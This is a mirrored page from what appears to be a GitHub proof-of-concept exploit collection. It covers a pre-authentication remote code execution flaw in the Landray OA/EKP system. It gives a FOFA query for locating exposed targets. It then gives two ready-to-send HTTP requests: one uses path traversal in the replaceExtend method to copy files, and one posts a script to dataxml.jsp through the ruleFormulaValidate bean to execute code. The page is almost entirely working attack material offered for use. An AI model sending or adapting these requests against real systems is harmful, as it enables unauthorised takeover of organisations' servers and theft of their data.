mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:44:53 +08:00
1.6 KiB
1.6 KiB
蓝凌KEP前台RCE漏洞
fofa
app="Landray-OA系统"
poc
copy文件
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: xx.xx.xx.xx
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin: http://www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
上传文件
POST /resource/help/kms/knowledge/dataxml.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Length: 17392
Content-Type: application/x-www-form-urlencoded
s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test
